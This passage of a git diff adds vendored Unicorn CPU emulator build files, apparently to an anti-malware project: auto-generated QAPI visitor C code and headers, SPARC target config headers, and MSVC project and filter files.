GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int32List *native_i = (int32List *)i; + visit_type_int32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int64List(Visitor *m, int64List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int64List *native_i = (int64List *)i; + visit_type_int64(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint8List(Visitor *m, uint8List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint8List *native_i = (uint8List *)i; + visit_type_uint8(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint16List(Visitor *m, uint16List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint16List *native_i = (uint16List *)i; + visit_type_uint16(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void 
visit_type_uint32List(Visitor *m, uint32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint32List *native_i = (uint32List *)i; + visit_type_uint32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint64List(Visitor *m, uint64List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint64List *native_i = (uint64List *)i; + visit_type_uint64(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_ErrorClassList(Visitor *m, ErrorClassList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + ErrorClassList *native_i = (ErrorClassList *)i; + visit_type_ErrorClass(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_ErrorClass(Visitor *m, ErrorClass *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, ErrorClass_lookup, "ErrorClass", name, errp); +} + +void visit_type_X86CPURegister32List(Visitor *m, X86CPURegister32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } 
+ + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + X86CPURegister32List *native_i = (X86CPURegister32List *)i; + visit_type_X86CPURegister32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_X86CPURegister32(Visitor *m, X86CPURegister32 *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, X86CPURegister32_lookup, "X86CPURegister32", name, errp); +} + +static void visit_type_X86CPUFeatureWordInfo_fields(Visitor *m, X86CPUFeatureWordInfo **obj, Error **errp) +{ + Error *err = NULL; + visit_type_int(m, &(*obj)->cpuid_input_eax, "cpuid-input-eax", &err); + if (err) { + goto out; + } + visit_optional(m, &(*obj)->has_cpuid_input_ecx, "cpuid-input-ecx", &err); + if (!err && (*obj)->has_cpuid_input_ecx) { + visit_type_int(m, &(*obj)->cpuid_input_ecx, "cpuid-input-ecx", &err); + } + if (err) { + goto out; + } + visit_type_X86CPURegister32(m, &(*obj)->cpuid_register, "cpuid-register", &err); + if (err) { + goto out; + } + visit_type_int(m, &(*obj)->features, "features", &err); + if (err) { + goto out; + } + +out: + error_propagate(errp, err); +} + +void visit_type_X86CPUFeatureWordInfo(Visitor *m, X86CPUFeatureWordInfo **obj, const char *name, Error **errp) +{ + Error *err = NULL; + + visit_start_struct(m, (void **)obj, "X86CPUFeatureWordInfo", name, sizeof(X86CPUFeatureWordInfo), &err); + if (!err) { + if (*obj) { + visit_type_X86CPUFeatureWordInfo_fields(m, obj, errp); + } + visit_end_struct(m, &err); + } + error_propagate(errp, err); +} + +void visit_type_X86CPUFeatureWordInfoList(Visitor *m, X86CPUFeatureWordInfoList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { 
+ X86CPUFeatureWordInfoList *native_i = (X86CPUFeatureWordInfoList *)i; + visit_type_X86CPUFeatureWordInfo(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.h new file mode 100644 index 0000000..51bd088 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/qapi-visit.h @@ -0,0 +1,51 @@ +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QAPI_VISIT_H +#define QAPI_VISIT_H + +#include "qapi/visitor.h" +#include "qapi-types.h" + + +#ifndef QAPI_VISIT_BUILTIN_VISITOR_DECL_H +#define QAPI_VISIT_BUILTIN_VISITOR_DECL_H + +void visit_type_strList(Visitor *m, strList **obj, const char *name, Error **errp); +void visit_type_intList(Visitor *m, intList **obj, const char *name, Error **errp); +void visit_type_numberList(Visitor *m, numberList **obj, const char *name, Error **errp); +void visit_type_boolList(Visitor *m, boolList **obj, const char *name, Error **errp); +void visit_type_int8List(Visitor *m, int8List **obj, const char *name, Error **errp); +void visit_type_int16List(Visitor *m, int16List **obj, const char *name, Error **errp); +void visit_type_int32List(Visitor *m, int32List **obj, const char *name, Error **errp); +void visit_type_int64List(Visitor *m, int64List **obj, const char *name, Error **errp); +void visit_type_uint8List(Visitor *m, uint8List **obj, const char *name, Error **errp); +void visit_type_uint16List(Visitor *m, uint16List **obj, const char *name, Error **errp); +void 
visit_type_uint32List(Visitor *m, uint32List **obj, const char *name, Error **errp); +void visit_type_uint64List(Visitor *m, uint64List **obj, const char *name, Error **errp); + +#endif /* QAPI_VISIT_BUILTIN_VISITOR_DECL_H */ + + +void visit_type_ErrorClass(Visitor *m, ErrorClass *obj, const char *name, Error **errp); +void visit_type_ErrorClassList(Visitor *m, ErrorClassList **obj, const char *name, Error **errp); + +void visit_type_X86CPURegister32(Visitor *m, X86CPURegister32 *obj, const char *name, Error **errp); +void visit_type_X86CPURegister32List(Visitor *m, X86CPURegister32List **obj, const char *name, Error **errp); + +void visit_type_X86CPUFeatureWordInfo(Visitor *m, X86CPUFeatureWordInfo **obj, const char *name, Error **errp); +void visit_type_X86CPUFeatureWordInfoList(Visitor *m, X86CPUFeatureWordInfoList **obj, const char *name, Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/config-target.h new file mode 100644 index 0000000..3702f2f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_SPARC 1 +#define TARGET_NAME "sparc" +#define TARGET_SPARC 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj new file mode 100644 index 0000000..77bf054 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj @@ -0,0 +1,230 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + 
<ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\sparc.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\sparc\leon3.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile 
Include="..\..\..\qemu\target-sparc\cc_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\fop_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\int32_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\ldst_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\mmu_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\win_helper.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{698C2D54-475C-446F-B879-F629BBEF75FE}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sparcsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + 
<ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" 
Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc.h</ForcedIncludeFiles> + </ClCompile> + 
<Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + 
<AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + 
<OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj.filters new file mode 100644 index 0000000..95458e1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj.filters @@ -0,0 +1,122 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{d424a094-0a26-4db6-85e9-e75f81c6e142}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{dec3e9f1-0fc3-454e-ae70-78d866b5c3f8}</UniqueIdentifier> + </Filter> + <Filter Include="hw\sparc"> + <UniqueIdentifier>{0a04b798-735c-4115-ab62-b6cfc772efed}</UniqueIdentifier> + </Filter> + <Filter Include="target-sparc"> + <UniqueIdentifier>{10f0c533-e16b-4e31-b979-812af068bb36}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{b229bf2b-cc40-4135-b3b7-40c73bd9f597}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{133a0d6a-6f71-4d4b-be6d-f90636aa02a2}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu-qom.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\helper.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\unicorn.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\sparc.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\hw\sparc\leon3.c"> + <Filter>hw\sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\fop_helper.c"> + 
<Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\ldst_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\mmu_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\translate.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\win_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\cc_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\cpu.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\unicorn.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\int32_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/config-target.h new file mode 100644 index 0000000..63fa864 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_SPARC64 1 +#define TARGET_NAME "sparc64" +#define TARGET_SPARC 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj new file mode 100644 index 0000000..1f0dea5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj @@ 
